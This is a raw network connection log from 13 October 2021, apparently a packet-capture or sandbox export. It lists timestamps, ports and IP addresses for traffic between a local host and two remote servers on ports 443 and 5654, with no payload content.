Oct 13, 2021 21:02:56.429559946 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.429572105 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.429589033 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.429608107 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.429775953 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.454406977 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.454423904 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.454499006 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.454509974 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.454514027 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.454562902 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.454561949 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.454591990 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.454603910 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.454647064 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.454662085 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.454673052 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.454725027 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.479573011 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.479592085 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.479677916 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.479713917 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.479722023 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.479732990 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.479799032 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.479804039 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.479860067 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.479866028 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.479919910 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.479924917 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.480009079 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.480014086 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.480078936 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.480117083 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.480190039 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.480190992 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.480214119 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.480283976 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.505281925 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.505316019 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.505352020 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.505471945 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.505486012 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.505821943 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.505847931 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.505907059 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.505917072 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.505939007 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.505959988 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.505984068 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.506036997 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.506046057 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.506066084 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.506205082 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.506230116 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.506268024 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.506274939 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.506302118 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.506390095 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.506408930 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.506448984 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.506455898 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.506481886 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.506570101 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.506591082 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.506638050 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.506647110 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.506684065 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.506809950 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.507028103 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.530339956 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.530376911 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.530584097 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.530600071 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.531696081 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.531725883 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.531776905 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.531789064 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.531814098 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.531816006 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.531843901 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.531951904 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.531971931 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.531984091 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.532015085 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.532160997 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.532203913 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.532211065 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.532238007 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.532269001 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.532613039 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.532641888 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.532706022 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.532713890 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.532731056 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.532742977 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.532761097 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.532772064 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.532778025 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.532831907 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.532861948 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.532871962 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.532881021 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.532883883 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.532917976 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.532924891 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.532958031 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.532960892 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.532974958 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.532995939 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.533027887 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.533162117 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.533169985 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.533204079 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.533240080 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.533246040 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.533273935 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.533292055 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.533324957 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.533353090 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.533392906 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.533400059 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.533428907 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.533557892 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.533576965 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.534195900 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.580899954 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.580929041 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.580997944 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.581048012 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.581069946 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.581104040 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.581114054 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.581125021 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.581144094 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.581151962 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.581161022 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.581197977 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.581207991 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.581238031 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.581244946 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.581264019 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.581276894 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.581293106 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.581336975 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.581346989 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.581367016 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.581371069 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.581389904 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.581435919 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.581454039 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.581463099 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.581466913 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.581478119 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.581486940 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.581521034 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.581532001 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.581548929 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.581556082 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.581568003 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.581625938 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.581636906 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.581656933 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.581676960 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.581682920 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.581707001 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.581717014 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.581744909 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.581747055 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.581773043 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.581796885 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.581809044 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.581818104 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.581842899 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.581871033 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.581875086 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.581885099 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.581898928 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.581929922 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.581942081 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.582040071 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.582104921 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.582259893 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.582715988 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.619626999 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.831954956 CEST	49754	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:02:56.855954885 CEST	5654	49754	91.121.250.249	192.168.2.7
Oct 13, 2021 21:02:57.364207029 CEST	49754	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:02:57.388421059 CEST	5654	49754	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:01.667103052 CEST	49755	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:01.691617966 CEST	5654	49755	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:02.223058939 CEST	49755	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:02.247492075 CEST	5654	49755	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:02.655133963 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:02.655174971 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:02.655782938 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:02.709825039 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:02.709851980 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:02.821751118 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:02.821996927 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:02.825814962 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:02.825830936 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:02.826100111 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:02.910600901 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:02.926256895 CEST	49755	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:02.950906992 CEST	5654	49755	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:03.655570984 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.705199957 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.708009958 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.708061934 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.708133936 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.708142996 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.710848093 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.710865974 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.733411074 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.733629942 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.733649015 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.733666897 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.733674049 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.733738899 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.733751059 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.733772993 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.733798027 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.733807087 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.733819008 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.733825922 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.733840942 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.733851910 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.733869076 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.734188080 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.759804010 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.759829044 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.759854078 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.759900093 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.759912014 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.759932995 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.759947062 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.759959936 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.760019064 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.760030985 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.760035038 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.760037899 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.760056019 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.760066986 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.760080099 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.760097980 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.760130882 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.760284901 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.760330915 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.760360956 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.760411024 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.760436058 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.760448933 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.760464907 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.761018038 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.785634041 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.785712957 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.785758972 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.785907984 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.785973072 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.786005020 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.786005974 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.786171913 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.786252022 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.786262035 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.786284924 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.786520004 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.786546946 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.786681890 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.786906004 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.786974907 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.786994934 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.787000895 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.787239075 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.787272930 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.787435055 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.787461996 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.787466049 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.812833071 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.812961102 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.813003063 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.813014030 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.813069105 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.813097954 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.813138962 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.813163042 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.813167095 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.813184977 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.813251019 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.813270092 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.813308001 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.813318968 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.813380003 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.813405991 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.813432932 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.813446999 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.813461065 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.813530922 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.813536882 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.813570976 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.813599110 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.813654900 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.813664913 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.813687086 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.813832998 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.813865900 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.813957930 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.813991070 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.814120054 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.814239979 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.814250946 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.814275026 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.814285994 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.814289093 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.814305067 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.814444065 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.814554930 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.814599037 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.814603090 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.814605951 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.814620018 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.814676046 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.814693928 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.814724922 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.814733982 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.814908981 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.814922094 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.814935923 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.815830946 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.866449118 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.866487026 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.866575003 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.872616053 CEST	49756	443	192.168.2.7	31.14.69.10
